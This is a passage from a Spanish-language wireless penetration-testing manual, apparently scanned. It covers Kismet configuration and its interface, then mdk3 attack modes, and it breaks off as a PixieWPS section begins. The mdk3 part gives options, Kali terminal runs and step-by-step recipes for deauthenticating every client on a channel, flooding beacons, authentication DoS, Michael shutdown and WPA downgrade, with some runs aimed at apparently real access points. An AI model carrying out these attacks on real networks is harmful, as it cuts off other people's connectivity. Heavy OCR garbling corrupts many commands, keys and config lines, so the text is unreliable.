# MAG addresses aiiowed. MAG address masks are aiiowed. 
apspoof=Pool:ssidregex="(?i:foobar)",vaiidmacs=00:ll:22:33:44:55 
apspoof=Poo2:ssid="Poobar",vaiidmacs="00:ll:22:33:44:55,aa:bb:cc:dd:ee:ff" 

# Known WEP keys to decrypt, bssid,hexkey. This is oniy for networks where 

# the keys are aiready known, and it may impact throughput on siower hardware. 

# Muitipie wepkey Unes may be used for muitipie BSSIDs. 

# wepkey=00:DE:AD:G0:DE:00,PEEDPAGEDEADBEEP01020304050607080900 

# Is transmission of the keys to the ciient aiiowed? This may be a security 

# risk for some. If you disable this, you wiii not be abie to query keys from 

# a ciient. 

aiiowkeytransmit=true 

# How often (in seconds) do we write aii our data fiies (0 to disabie) 
writeintervai=300 

# Do we use sound? 

# Not to be confused with GUI sound parameter, this controis wether or not the 

# server itseif wiii piay sound. Primariiy for headiess or automated Systems. 
enabiesound=faise 

# Path to sound piayer 
soundbin=piay 

sound=newnet,true 

sound=newcryptnet,true 

sound=packet,true 

sound=gpsiock,true 

sound=gpsiost,true 



sound=alert,true 


# Does the server have speech? (Again, not to be confused with the GUI's speech) 
enablespeech=false 

# Binary used for speech (if not in path, full path must be specified) 
speechbin=flite 

# Specify raw or festival; Flite (and anything else that doesn't need formatting 

# around the string to speak) is 'raw', festival requires the string be wrapped in 

# SayTextC'...") 
speechtype=raw 

# How do we speak? Valid options: 

# speech Normal speech 

# nato NATO spellings (alpha, bravo, charlie) 

# spell Spell the letters out (aye, bee, sea) 
speechencoding=nato 

speech=new,"New network detectad s.s.i.d. %1 channel %2" 
speech=alert,"Alert %1" 
speech=gpslost,"G.P.S. signal lost" 
speech=gpslock,"G.P.S. signal O.K." 

# How many alerts do we backlog for new clients? Only changa this if yon have 

# a -very- low memory system and need those extra bytes, or if yon have a high 

# memory system and a huge number of alert conditions. 
alertbacklog=50 


# File types to log, comma seperated. Built-in log file types: 

# alert Text file of alerts 

# gpsxml XML per-packet GPS log 

# nettxt Networks in text format 

# netxml Networks in XML format 

# pcapdump tcpdump/wireshark compatible pcap log file 

# string All strings sean (increases GPU load) 

logtypes=pcapdump,gpsxml,netxml,nettxt, alert 


# Format of the pcap dump (PPI or 80211) 
pcapdumpformat=ppi 

# pcapdumpformat=80211 


# Default log title 
logdefault=Kismet 


# logtemplate - Filename logging témplate. 

# This is, at first glance, really nasty and ugly, but you'll hardly ever 

# have to touch it so don't complain too much. 

# 

# %p is replaced by the logging prefix + '/' 

# %n is replaced by the logging instance ñame 

# %d is replaced by the starting date as Mon-DD-YYYY 

# %D is replaced by the current date as YYYYMMDD 

# %t is replaced by the starting time as HH-MM-SS 



# %i is replaced by the increment log in the case of múltiple logs 

# %1 is replaced by the log type (pcapdump, strings, etc) 

# %h is replaced by the home directory 

logtemplate=%p%n-%D-%t-%i.%l 

# Where State info, etc, is stored. You shouldnt ever need to change this. 

# This is a directory. 
configdir=%h/.kismet/ 

Si deben eambiar las opeiones de kismet.eonf dependiendo de eomo se vaya a usar Kismet. Por 
ejemplo si está buseando un AP, se estableeerá ehannelhop = true set, eomo mínimo y tal vez 
también algunos ajustes ner-grained. Si se eoneentra exelusivamente en un únieo AP y se desea 
obtener todo el seguimiento que puede obtener de él, desaetivará el salto de eanal para no perder 
paquetes mientras explora otros eanales. Esto puede ser útil para la deteeeión de intrusos, ya que 
querrá rastrear a todos los olientes que intenten o se asoeien eon el AP 

Nombre de usuario: A veees el kismet no arranea porque en el kismet.eonf esta eonfigurado un 
nombre de usuario que no es el que estamos usando. Por ejemplo si estamos eomo usenpepito 
debería de poner en el kismet.eonf:suiduser=pepito 

Clave wep: Si sabemos la elave wep de alguna red y queremos ver en el kismet los paquetes 
deseneriptados de la misma, podemos espeeifiear en el kismet.eonf la elave wep de la siguiente 
forma: wepkey=bssid,HEXkey Por ejemplo: 

wepkey=00:DE:AD:C0:DE:00,PEEDPACEDEADBEEP01020304050607080900 

Channel Veloeity: Este es el número de veees que kismet forzará la tarjeta para monitorizar o 
eseanear diferentes eanales en un segundo. Por defeeto está eonfigurado a 5. Para eseanear más 
eanales por segundo hay que inerementar este valor y para eseanear menos eanales por segundo 
habrá que redueir el valor. 

De manera predeterminada, Kismet eseribe sus registros en el direetorio en el que se inieió. Puede 
eambiar este eomportamiento eon la direetiva logtemplate en kismet.eonf Amenos que modifique 
la direetiva logtypes en kismet.eonf, Kismet ereará registros eon los formatos siguientes: 

• dump: Extensión similar a la .eap que usa el airodump. 

• network: Arehivo de texto eon los datos de las redes deteetadas. 

• esv: Arehivo de texto eon los datos de las redes deteetadas separados por eomas; formato 
CSV (Comma Separated Valué). 

• xml: Arehivo de texto eon los datos de las redes deteetadas en formato xml. 

• weak: Paquetes débiles deteetados, en formato para ser utilizados eon AirSnort, eon el fin de 
eraekear elaves WEP. 

• eiseo: Reeoge informaeión sobre los equipos eiseo deteetados en formato CDP (Ciseo 
Diseovery Protoeol). 

• gps: Si tenemos GPS, guarda las eoordenadas de las redes 

20.3. Modelos de configuración 

Kismet está diseñado eomo una aplieaeión eliente-servidor, pero se puede ejeeutar eomo una 
aplieaeión independiente, es deeir, eomo servidor que admite varios elientes e ineluso eomo un 
servidor eon instalaeiones de Kismet "drone" en una red, eada una monitorizando su propio 



hardware inalámbrico y todos los paquetes de reenvió capturados a un servidor. Si se ejecutar de 
forma independiente, simplemente utiliza el cliente incorporado. 


Los Kismet drones son mensajes minimalistas, a menudo sin cabecera, que escuchan Kismet en una 
red. Cada uno usa su propio archivo de configuración individual, define sus propias fuentes o sus 
tarjetas inalámbricas para escuchar y contiene la dirección del servidor Kismet al que reenviará los 
paquetes capturados. El servidor registra los datos de todos los drones conectados a un solo archivo, 
y también puede proporcionar una única fuente de alertas de intrusión inalámbrica para la red. Esta 
configuración es ideal para utilizar Kismet como un sistema inalámbrico de detección de intrusos 
(IDS) en una LAN con más de uno o dos AP. 

Cada uno de estos componentes requiere su propio archivo de configuración y estos archivos hacen 
gran parte del trabajo requerido para que Kismet funcione como se desea. Son los archivos 
kismet.conf, kismet ui.conf y kismet drone.conf. 

La interfaz de usuario de Kismet no es intuitiva, pero es rápida y potente y fácil de usar una vez que 
se acostumbra. De manera predeterminada, la interfaz gráfica se abre con Auto, una lista de nivel 
superior de todas las redes que puede ver. Desde este punto de vista, se puede obtener información 
básica sobre las redes detectadas, pero a diferencia de otros modos de lista de red, no puede 
profundizar para obtener información más detallada. 

La lista de Auto Network muestra un indicador decay, nombre de red, tipo de red, estado de WEP, 
canal utilizado, paquetes vistos, ags, rango de IP y el tamaño del archivo de captura. El indicador 
decay puede ser un signo de exclamación (!), un punto (.) o un espacio en blanco. Un signo de 
exclamación indica actividad reciente, el punto actividad menos reciente y en blanco significa que 
no hay actividad reciente. Ea definición de reciente se basa en la variable decay en kismet_ui.conf. 
El valor de decay predeterminado es de 3 segundos. 

Para profundizar y obtener más detalles, primero debe cambiar a una vista diferente. Ea interfaz de 
Kismet proporciona una función de ayuda que explica en detalle como hacerlo. Presionar h para 
obtener la ventana emergente de ayuda. Se puede presionar x para cerrarla o cualquier otra ventana 
emergente que se esté viendo y puede desplazarse por las pantallas de ayuda con las teclas Page Up 
y Page Down 

Si se desplaza a la última pantalla en la ventana emergente de ayuda, se verá lo siguiente en letras 
mayúsculas: ALE NETWORK SEEECTION, TAGGING, GROUPING, SCROEEING, AND SO 
ON IS DISABEED IN AUTOEIT MODE. 

Después de cerrar la ventana emergente de ayuda, presionar s para seleccionar un orden de 
clasificación diferente para la lista de redes, luego presione b o B para ordenar la lista por BSSID, 
que es la dirección MAC del AP de la red. El titulo del panel Network Eist ahora leerá Network Eist 
(BSSID) y se puede usar las teclas flecha hacia arriba o hacia abajo para desplazarse hacia arriba y 
hacia abajo en la lista hasta el dispositivo del que está interesado en obtener más información. 

Con la red de interés resaltada, presionar i para obtener información completa y detallada sobre este 
AP. Presionar a para ver estadisticas sobre su seguimiento por canal o presionar c para ver las 
direcciones MAC de todos los clientes que Kismet ha detectado hablando con el AP. Si está 
utilizando Kismet para proteger su propio AP, esa última opción será especialmente interesante. 

Tener en cuenta que cuando aparece la lista de clientes después de presionar c, la ventana del panel 
muestra Client Eist (Autot). Eunciona igual que la Network Eist, lo que significa que para 
profúndizar más, deberá cambiar la vista de la misma manera que antes. Si elige 1, enumera los 



clientes en el último orden visto. Una L mayúscula revertiría esa lista, de modo que los olientes 
vistos más reoientemente apareoerían en la parte inferior. Si se resalta un cliente en partioular, tal 
oomo lo hizo oon una red, y luego se presiona i, se verá la informaoión sobre el oliente está 
disponible, que inoluye el tipo de oonexión, la direooión MAC y muoho más. 

También tener en ouenta que ahora la fúnoión h muestra ayuda espeoífioa del contexto, no la misma 
informaoión de ayuda que vio al presionar h oon la Network List predeterminada mostrada. En este 
oaso, la mayor parte de la pantalla está dedioada a explioar los distintos tipos de oonexión: From 
DS, To DS, Intra DS, Established, Sent To, and Unknown 

Como vemos la interfaz de Kismet oonsta de 3 pantallas y varias ventanas de tipo popup. Ea 
ventana prinoipal "Network list" es donde apareoerán las diversas redes que podemos llegar a ver. 

Ea ventana "Info" donde se puede llevar un oonteo de los paquetes reoibidos, redes detectadas, 
paquetes oifrados, paquetes débiles, oanal aotual, tiempo, oto. Por último la ventana de estado 
"Status" en donde se remaroan los últimos eventos, oomo redes desoubiertas, IPs, direooiones MAC, 
oto. Veamos las tres ventanas detalladamente: 

1.-NETWORK EIST 

Ea ventana oentral, "Network list" está dividida en varias oolumnas, las ouales nos informarán 
según vaya oapturando redes de diversa informaoión: 

• Ñame: Essid o nombre ("abas") de la red deteotada. Al lado de Ñame podemos enoontrar un 
signo de exolamaoion (!) un punto (.) o simplemente nada ( ), esto nos indioa el tiempo que 
ha pasado desde que se reoibio un paquete en esa red: (!) Indioa actividad detectada en los 
últimos 3 segundos. (.) Indica actividad detectada en los últimos 6 segundos. () No hay 
aotividad. Eos oolores indioan si usan oifrado y , en general, ouan seguro es cada uno. El 
verde indioa oifrado, el amarillo sin oifrado, el rojo equipos que están oon la oonfiguraoión 
de fábrioa (sin wep) y el azul redes oon essid ooulto. 

• Columna Clnt: Nos indioa el número de olientes detectados en esa red o grupo de redes. 

• Columna T: Nos indica el modo de fúncionamiento del dispositivo Wifi deteotado. Este flag 

nos ofreoerá diferentes valores oomo [A] si es un punto de aoceso (AP: aooes point), [H] si 
esta en modo ad-hoo, [G] si es un grupo de redes wireless o [P] si es un dispositivo en modo 
"probe request" (tarjeta wifi que no está ooneotada a ningún AP). 

• Columna W: Uso de oifrado: [Y] en oaso de usar WEP, [N] si es abierta, [ O ] si usa otro tipo 
de oifrado. 

• Columna Ch: El oanal en el que opera la red. Si es un grupo de redes [G] apareoe un guión. 

• Columna Rato: Ea velooidad máxima de la red (11, 22, 54....). 

• Columna SignalGraph: Ea intensidad de la señal en modo gráfioo. No está soportado por 

todas las tarjetas. 

• Columna Nse: El ruido deteotado en esa red. Tampooo esta soportado por todos los ohipsets. 

• Columna Paokets: El número de paquetes oapturadados. 

• Columna Flags: Nos informará trás el análisis de los paquetes oon diversos valores de 
banderas el tipo de clase de red que estamos investigando. Para ello nos mostrará valores por 
ejemplo oomo T3 en oaso de tratarse de tráfioo TCP , U3 en oaso de tratarse de tráfioo UDP, 
A3 en oaso de tratarse de tráfioo ARP, D si es tráfioo DHCP, W si es un paquete de datos 
WEP descifrados por haber introduoido la key en el ki s met.conf etc. 

• Ip rango: Nos dirá el rango IP de la red o dispositivo deteotado. Mientras se hace un análisis 
exhautivo de las tramas detectadas este valor apareoerá oon valor 0.0.0.0 

• Size: Nos indioa el tamaño de los paquetes oapturados de cada red. 


2.- Ventana STATUS 



Está en la parte inferior de la pantalla y nos mantiene informados sobre las redes y elientes que va 
eneontrando y otras alertas, así eomo el estado de la batería. 

3.- Ventana INFO 

Es la que está en el lado dereeho y muestra: 

• El número total de redes eneontradas (Ntwrks) 

• El número total de paquetes eapturados (Pekets) 

• El número de paquetes eifrados eapturados (Cryptd) 

• El número de paquetes eon IVs débiles (Weak) 

• El nivel de ruido (Noise) 

• El número de paquetes deseartados (Diserd) 

• El número de paquetes eapturados por segundo (Pkts/s) 

• El tipo de tarjeta usada (orinoeo, prism...) 

• El eanal en el que está sniflfando (Ch:) 

• El tiempo que kismet lleva ejeeutándose (Elapsd) 

20.4. Plugins 

Con la nueva base de eódigo Kismet (Kismet-2018-Betal y más reeiente), Kismet admite plugins 
que amplían la funeionalidad de WebUI a través de Javaseript y mejoras en el lado del navegador, 
así eomo la arquiteetura de eomplementos Kismet más tradieional de eomplementos C ++ que 
pueden ampliar la funeionalidad del servidor Un nivel bajo. Kismet también es eompatible eon 
herramientas auxiliares externas que pueden ampliar la funeionalidad del servidor a través de 
herramientas de seeueneias de eomandos eomo Python. Entre muehos otros y dependiendo de la 
arquireetura, 

• autowep: deteets the WEP key from BSSID and SSID; 

• btsean: basie sean support for the 802.15.1 (Bluetooth) protoeol; 

• ptw: performs the Aireraek-ng PTW attaek against eaptured data; 

• speetools: imports data from the speetools speetrum analyzer; 

• syslog: provides supports for alerts using standard unix syslog serviees. 

Por ejemplo para la arquiteetura i386: 

/usr/lib/kismet/aireraek-kismet.so 

/usr/lib/kismet/alertsyslog.so 

/usr/lib/kismet/autowep-kismet.so 

/usr/lib/kismet/btsean.so 

/usr/lib/kismet/kismet-syslog.so 

/usr/lib/kismet/speetool_net.so 

/usr/lib/kismet_ehent/btsean_ui.so 

/usr/lib/kismet_ehent/speetools_ui.so 

/usr/share/doe/kismet-plugins/README.gz 

/usr/share/doe/kismet-plugins/ehangelog. Debían, gz 

/usr/share/doe/kismet-plugins/ehangelog.Debian. i3 86 .gz 

/usr/share/doe/kismet-plugins/ehangelog. gz 

/usr/share/doe/kismet-plugins/eopyright 

/usr/share/lintian/overrides/kismet-plugins 





21. mdk3 


MDK3 explota las vulnerabilidades en el estándar 802.11 y tiene una gran cantidad de opciones que 

permiten su uso de una forma flexible. 

Uso; mdk3 <interfaz> <Modo de test> [opciones de test] 

21.1. Modos de test 

Los modos de test disponibles son: 

• Modo Beacon Flood (b). Envía paquetes beacon para mostrar AP falsos a los clientes. 

• Modo Authentication DoS (a). Envía paquetes de autenticación a todos los AP encontrados 
en el rango. 

• Modo de prueba básica y fuerza bruta ESSID (p). Sondea cada AP y veriflca la respuesta. Es 
útil para veriflcar si el SSID se ha desacoplado correctamente o si el AP está en el rango de 
envío de sus adaptadores. También es posible con este modo de prueba la fuerza bruta 
ESSID. 

• Modo Deauthentication / Disassociation Amok (d). Golpea a cada cliente de cada AP 
encontrada. 

• Michael shutdown exploitation (TKIP) (m). Cancela todo el tráflco continuamente. 

• Tests 802. IX (x) 

• WIDS/WIPS Confusión (w). Sistemas de detección y prevención de intrusos de confusión / 
abuso 

• Modo de fuerza bruta de flltro MAC (f). Esta prueba utiliza una lista de direcciones MAC de 
cliente conocidas e intenta autenticarlos en el AP dado mientras cambia dinámicamente su 
tiempo de respuesta para el mejor rendimiento. Actualmente solo funciona en AP que niegan 
una solicitud de autenticación abierta correctamente. 

• Test WPA Downgrade (g). Desauténtica las estaciones y los puntos de acceso que envían 
paquetes encriptados WPA. Con esta prueba, se puede comprobar si el administrador del 
sistema intentará conflgurar su red para WEP o deshabilitar el cifrado. 

Ejecutar mdk3 —help <test_mode> para obtener información sobre una sola prueba 

Modo Beacon Flood (b). 

Envía paquetes beacon para mostrar los AP falsos a los clientes. 

Opciones 


-n <ssid> 

Usar un SSID en lugar de los generados aleatoriamente 

-f <fllename> 

Eeer los SSID del archivo 

-V <fllename> 

Eeer MAC y SSID del archivo. 

-d 

Mostrar la estación como ad-hoc 

-w 

Establecer el bit WEP que genera redes encriptadas 

-g 

Mostrar la estación como 54 Mbit 

-t 

Mostrar la estación usando encriptación WPA TKIP 

-a 

Mostrar la estación usando encriptación WPA AES 

-m 

Usar un punto de acceso válido MAC de la base de datos OUI 

-h 

Saltar al canal donde se falsiflca AP. Esto hace que la prueba 





sea más efectiva contra algunos dispositivos/controladores, 
pero reduce la tasa de paquetes debido al salto de canal. 

-c <chan> 

Ealsificar un AP en el canal <chan>. Si se desea que su tarjeta 
salte a este canal, también debe configurar la opción -h. 

-s <pps> 

Establecer la velocidad en paquetes por segundo. 
Predeterminado: 50 


root@kali:-'# mdk3 wlanOmon b -n 

Current MAC: CD:BA:AB:F2:FB:E3 on Channel 2 with SSID: aVliORk 

Current MAC: 87:18:31:6E:F4:8B on Channel 5 with SSID: i8<!m 

Current MAC: 0C:9A:4A:AE:BA:78 on Channel 10 with SSID: :#(#V.S{!Tpv-l(yX>hmm 

Current MAC: 86:EA:91:7B:A3:AE on Channel 2 with SSID: @G}E P{p8 E[@,gRE6+tSkXmvv 

Packets sent: 181-Speed: 61 packets/sec^C 

root@kali:'-'# mdk3 wlanOmon b -n P8:8E:85:68:B2:10 
Current MAC: C6:69:73:51:PP:4A on Channel 2 with SSID: P8:8E:85:68:B2:10 
Current MAC: 25:B3:48:84:53:3A on Channel 4 with SSID: P8:8E:85:68:B2:10 
Current MAC: C7:16:9E:73:11:08 on Channel 7 with SSID: P8:8E:85:68:B2:10 
Current MAC: BE:11:2B:EP:6B:38 on Channel 12 with SSID: P8:8E:85:68:B2:10 
Packets sent: 176 - Speed: 62 packets/sec^C 

Modo Authentication DoS (a). 

Envia paquetes de autenticación a todos los AP encontrados en el rango. 

Opciones 


-a <ap mac> 

Solo probar el AP especificado 

-m 

Usar un cliente MAC válido de la base de datos OUI 

-c 

No verificar que la prueba sea exitosa 

-i <ap mac> 

Realizar una prueba inteligente en AP. Esta prueba conecta a 
los clientes con el AP y reinyecta los datos escaneados para 
mantenerlos con vida. 

-s <pps> 

Establecer la velocidad en paquetes por segundo 
Predeterminado: ilimitado 


root@kali:'-'# mdk3 wlanOmon a 
Trying to get a new target AP... 

AP D2:6E:DE:54:D7:8P is responding! 

Connecting Client: 67:C6:69:73:51:PP to target AP: D2:6E:DE:54:D7:8P 
Connecting Client: ED:86:78:P0:74:E1 to target AP: D2:6E:DE:54:D7:8P 
Connecting Client: 9D:A3:DA:52:92:P6 to target AP: D2:6E:DE:54:D7:8P 
AP D2:6E:DE:54:D7:8P seems to be INVULNERABLE! 

Device is still responding with 500 clients connected! 

Trying to get a new target AP... 

AP D0:6E:DE:54:D5:8E is responding! 

Connecting Client: 1D:4D:1B:7A:38:52 to target AP: D0:6E:DE:54:D5:8E 
Connecting Client: 4B:03:2C:C2:P7:40 to target AP: D0:6E:DE:54:D5:8E 
Connecting Client: C6:64root@kali:-'# mdk3 wlanOmon a D0:6E:DE:54:D5:8E 
Trying to get a new target AP... 

AP D0:6E:DE:54:D5:8E is responding! 

Connecting Client: 67:C6:69:73:51:PP to target AP: D0:6E:DE:54:D5:8E 





Connecting Client: EC:CD:26:8F:7E:B2 to target AP: D0:6E:DE:54:D5:8E 
Connecting Client: 05:A4:93:EE:9D:7E to target AP: D0:6E:DE:54:D5:8E 
Conneeting Client: 8F:99:69:9E:A1:E4 to target AP: D0:6E:DE:54:D5:8E 
Connecting Client: 03:C2:CC:F6:8A:26 to target AP: D0:6E:DE:54:D5:8E 
AP D0:6E:DE:54:D5:8E seems to be INVULNERABEE! 

Device is still responding with 500 clients connected! 

Connecting Client: BA:78:66:61:ED:5Ato target AP: D0:6E:DE:54:D5:8E 
Trying to get a new target AP... 

Connecting Client: 69:85:C3:07:B7:59 to target AP: D0:6E:DE:54:D5:8E 
Packets sent: 676 - Speed: 174 packets/sec^C 

root@kali:'-'# mdk3 wlanOmon a -a D0:6E:DE:54:D5:8E 
AP D0:6E:DE:54:D5:8E is responding! 

Connecting Client: 67:C6:69:73:51:FF to target AP: D0:6E:DE:54:D5:8E 
Connecting Client: D9:A8:87:75:65:70 to target AP: D0:6E:DE:54:D5:8E 
Connecting Client: 4B:5F:56:C4:F7:BB to target AP: D0:6E:DE:54:D5:8E 
Connecting Client: 30:3E:C2:58:FB:12 to target AP: D0:6E:DE:54:D5:8E 
AP D0:6E:DE:54:D5:8E seems to be INVULNERABEE! 

Device is still responding with 500 clients connected! 

Connecting Client: BB:69:85:C3:07:B7 to target AP: D0:6E:DE:54:D5:8E 
Connecting Client: 2E:AD:7B:5C:43:76 to target AP: D0:6E:DE:54:D5:8E 
Packets sent: 804 - Speed: 128 packets/sec^C 

root@kali:'-'# mdk3 wlanOmon a -i D0:6E:DE:54:D5:8E 
Sniffing one beacon frame to read capabilities and SSID... 

Capabilities are: 11:04 
SSID is: MIWIFI_2G_curr 

Clients: Created: 1 Authenticated: 0 Associated: 0 Got Kicked: 0 

Data : Capturad: 0 Sent: 0 Responses: 0 Relayed: 0 

Clients: Created: 8 Authenticated: 1 Associated: 0 Got Kicked: 0 

Data : Capturad: 0 Sent: 0 Responses: 0 Relayed: 0 

Clients: Created: 24 Authenticated: 2 Associated: 1 Got Kicked: 0 

Data : Capturad: 0 Sent: 0 Responses: 0 Relayed: 0 

Clients: Created: 26 Authenticated: 2 Associated: 1 Got Kicked: 0 

Data : Capturad: 0 Sent: 0 Responses: 0 Relayed: 0 

Clients: Created: 27 Authenticated: 2 Associated: 1 Got Kicked: 0 

Data : Capturad: 0 Sent: 0 Responses: 0 Relayed: 0 

Clients: Created: 31 Authenticated: 2 Associated: 1 Got Kicked: 0 

Data : Capturad: 0 Sent: 0 Responses: 0 Relayed: 0 

Clients: Created: 33 Authenticated: 2 Associated: 1 Got Kicked: 0 

Data : Capturad: 0 Sent: 0 Responses: 0 Relayed: 0 

Clients: Created: 34 Authenticated: 2 Associated: 1 Got Kicked: 0 

Data : Capturad: 0 Sent: 0 Responses: 0 Relayed: 0 

Packets sent: 836 - Speed: 32 packets/sec^C 

Prueba básica y modo ESSID Bruteforce (p) 

Prueba los puntos de acceso y comprueba si hay respuesta. Util para verificar si un SSID se ha 
desclasado correctamente o si el punto de acceso está en su rango de envío de adaptadores. También 
es posible aplicar la fuerza bruta ESSID. 

Opciones 

-e <ssid> Especificar el SSID del AP objetivo 




-f <filename> 

Eeer el archivo con la lista de SSID ocultos para aplicar la 
fuerza bruta 

-t <bssid> 

Establecer el BSSID del AP objetivo 

-s <pps> 

Establecer la velocidad. Predeterminado: ilimitado. 

En modo fuerza bruta: 300 

-b <character set> 

Usar el modo Bruteforce completo. 


root@kali:'-'# mdk3 wlanOmon p -e D0:6E;DE:54:D5:8E 
AP responded on 0 of 1 probes (0 pereent) 

AP responded on 0 of 4 probes (0 pereent) 

AP responded on 4 of 52 probes (7 pereent) 

AP responded on 0 of 19 probes (0 pereent) 

AP responded on 0 of 15 probes (0 pereent) 

AP responded on 0 of 5 probes (0 pereent) 

AP responded on 3 of 51 probes (5 pereent) 

AP responded on 0 of 18 probes (0 pereent) 

Modo Deauthentication / Dísassocíation Amok (d). 

Golpea todos los clientes encontrados desde el punto de acceso 
Opciones 


-w <filename> 

Eeer el archivo que contiene MAC que no interesan (modo 
Whitelist) 

-b <filename> 

Leer el archivo que contiene las MAC para ejecutar la prueba 
(modo Blacklist) 

-s <pps> 

Establecer la velocidad en paquetes por segundo 
Predeterminado: ilimitado 

-c [chan,chan,chan,...] 

Habilita el salto de canales. Sin proporcionar ningún canal, 
mdk3 saltará a todos los canales de 14 b/g. El canal se 
cambiará cada 5 segundos. 


Eas alertas que se generan se pueden ver si está activado el programa kismet. 
root@kali:'-'# mdk3 wlanOmon d 

Disconnecting between: PP:PP:PP:PP:PP:PP and: CC:D4:A1:2C:58:7E 
Disconnecting between: PP:PP:PP:PP:PP:PP and: A8:D3:P7:31:17:94 
Disconnecting between: PP:PP:PP:PP:PP:PP and: CC:D4:A1:0C:10:58 
Disconnecting between: PP:PP:PP:PP:PP:PP and: A8:9A:93:51:52:B0 
Disconnecting between: P0:79:60:1C:33:24 and: 30:D3:2D:EB:9D:E3 
Disconnecting between: 01:00:5E:00:00:07 and: A8:D3:P7:31:17:94 
Disconnecting between: 33:33:00:00:00:01 and: D2:6E:DE:54:D7:8P 
Disconnecting between: 9C:35:EB:3C:E7:D0 and: CC:D4:A1:2C:58:7E 
Packets sent: 65 - Speed: 8 packets/sec^C 

Modo Michael shutdown exploitation (TKIP) (m). 

Cancela continuamente todo el tráfico 
Opciones 


-t <bssid> 

Establecer la dirección MAC del AP objetivo 

-w <seconds> 

Segundos entre ráfagas. Predeterminado: 10 






-n <ppb> 

Establecer paquetes por ráfaga. Predeterminado: 70 

-j 

Utilice el nuevo TKIP QoS-Exploit. Solo necesita unos poeos 
paquetes para cerrar AP. 

-s <pps> 

Establecer la veloeidad de paquetes por segundo. 

Predeterminado: 400 


root@kali:'-'# mdk3 wlanOmon m 
Please specify MAC (option -t) 

root@kali:'-'# mdk3 wlanOmon m -t D0:6E:DE:54;D5:8E 
Packets sent: 141 - Speed: 70 packets/sec^C 

Modo 802.IX tests (x) 

0 - EAPOE Start packet flooding 
Opciones 


-n <ssid> 

Establecer el SSID del AP objetivo 

-t <bssid> 

Estableeer el BSSID del AP objetivo 

-w <WPA type> 

Estableeer el tipo de WPA: 1 - WPA, 2 - WPA2/RSN 
Predeterminado: 1 

-u <unioast cipher> 

Establecer el tipo de cifrado unicast: 1 - TKIP, 2 - CCMP 
Predeterminado: TKIP 

-m <multicast cipher> 

Establecer el tipo de eifrado multicast: 1 - TKIP, 2 - CCMP 
Predeterminado: TKIP 

-s <pps> 

Establecer la veloeidad de paquetes por segundo. 
Predeterminado: 400 


1 - EAPOE Eogoff test 
Opciones 


-t <bssid> 

Estableeer el BSSID del AP objetivo 

-0 <bssid> 

Estableeer el BSSID de STA objetivo 

-s <pps> 

Estableeer la veloeidad en paquetes por segundo. 
Predeterminado: 400 


Modo WIDSA¥IPS Confusión (w). 

Sistemas de deteceión y preveneión de intrusos de confusión/abuso 

Confunde un WDS con clientes eon autenticación múltiple que desordena las tablas de 

enrutamiento. 

Opeiones 


-e <SSID> 

Establecer el SSID de la red WDS objetivo 

-0 [chan,ohan,chan...] 

Usar salto de canal 

-z 

Activar el exploit WIDS de Zero Chaos. Autentiea clientes 
desde un WDS a AP extranjeros para haeer que WIDS se 
vuelva loeo. 


root@kali:'-'# mdk3 wlanOmon w -e Orange-1792 
Waiting 10 seconds for initialization... 

No APs have been found yet, waiting... 







Found AP: A8:D3;F7:31:17:94 on channel 6 
Found Client: FF:FF:FF:FF:FF:FF onAPA8:D3:F7:31:17:94 
Found Client: 01:00:5E:7F:FF:FA on AP A8:D3:F7:31:17:94 
Found Client: 01:00:5E:00:00:07 onAPA8:D3:E7:31:17:94 
Eound Client: 01:00:5E:00:01:BB on AP A8:D3:E7:31:17:94 
Eound Client: 01:00:5E:00:00:FB onAPA8:D3:P7:31:17:94 
Eound Client: 01:00:5E:00:00:02 onAPA8:D3:E7:31:17:94 
Eound Client: 33:33:00:00:00:EB on AP A8:D3:E7:31:17:94 
Eound Client: 33:33:00:00:00:16 on AP A8:D3:E7:31:17:94 
Eound Client: 01:00:5E:00:00:01 onAPA8:D3:E7:31:17:94 
Eound Client: 01:00:5E:00:00:EC onAPA8:D3:E7:31:17:94 
Eound Client: 33:33:00:00:00:02 on AP A8:D3:E7:31:17:94 

Modo de fuerza bruta del filtro MAC (f) 

Esta prueba utiliza una lista de direeeiones MAC de eliente eonoeidas e intenta autentiearlas en el 
AP dado mientras eambia dinámieamente su tiempo de espera de respuesta para obtener el mejor 
rendimiento. Aetualmente solo funeiona en AP que niegan una solieitud de autentieaeión abierta 
eorreetamente 
Opeiones 


-t <bssid> 

Especificar el BSSID del AP objetivo 

-m <mac> 

Configurar el rango de direcciones MAC a usar, por ejemplo, 00:12:34. 
Sin -m, se usará la base de datos interna. 

-f <mac> 

Configurar la dirección MAC para comenzar con la fuerza bruta. 


WPA Downgrade Test (w). 

Desautentiea las estaeiones y los puntos de aeeeso enviando paquetes eneriptados WPA. Con esta 
prueba, se puede verifiear si el administrador del sistema intentará eonfigurar su red en WEP o 
deshabilitar el eifrado. mdk3 permitirá que los olientes WEP y no oifrados trabajen, por lo que el 
administrador de sistemas simplemente piensa que el WPA está roto. 

Opción 

-t <bssid> Especificar el BSSID del AP objetivo 


21.2. Usodemdk3 

Ejemplo 1. Desautenticar todos los clientes de un canal. 

Para ello seguiremos los pasos siguientes: 

a) Primero necesitamos saber las interfaces de red de nuestro equipo, ya que para este ataque 
necesitamos una interfaz en modo promiscuo (monitor mode) y la forma mas idónea para saber lo 
que tenemos es ejecutar: iwconfig 

b) Ahora ejecutar sudo airmon-ng start wlanO para poner la interfaz wlanO en modo monitor 

c) Ejecutar airodump-ng wlanO para descubrir todas las redes wifi que hay, 

d) Ejecutar mdk3 wlanO d -c 6, es decir hacer un ataque modo d en el canal 6. 

Ejemplo 2. Inundación beacon. 

Se trata de llenar la red de puntos de acceso falso. Para ello se usará la opción -b y la cuestión es 
saturar la red de paquetes para limitar el acceso a los recursos de la red. 

Para ello seguiremos los pasos siguientes: 

a) Primero necesitamos saber las interfaces de red de nuestro equipo, ya que para este ataque 
necesitamos una interfaz en modo promiscuo (monitor mode) y la forma mas idónea para saber lo 
que tenemos es escribir en la terminal: iwconfig 





b) Ahora ejecutar sudo airmon-ng start wlanO para poner la interfaz wlanO en modo monitor 

c) El siguiente paso es lanzar el ataque de crear AP falsos y aquí podríamos hacerlo de 2 formas 
distintas, se podria hacer que mdk3 genere los nombres de AP al azar y de modo aleatorio, 
ejecutando; mdk3 wlanO b o ejecutar; mdk3 wlanO b -f /home/mdk3-v6/nombresAP donde el 
fichero nombresAP contiene los nombres de los AP falsos. 



22. PixieWPS 


Pixiewps es una herramienta escrita en lenguaje C que se utiliza para atacar oflfline con fuerza bruta 
el pin WPS que explota la entropía baja o inexistente de algunos puntos de acceso. 

Caracteristicas: 

• Optimización de suma de control: primero intentará obtener PIN válidos (11 000) 

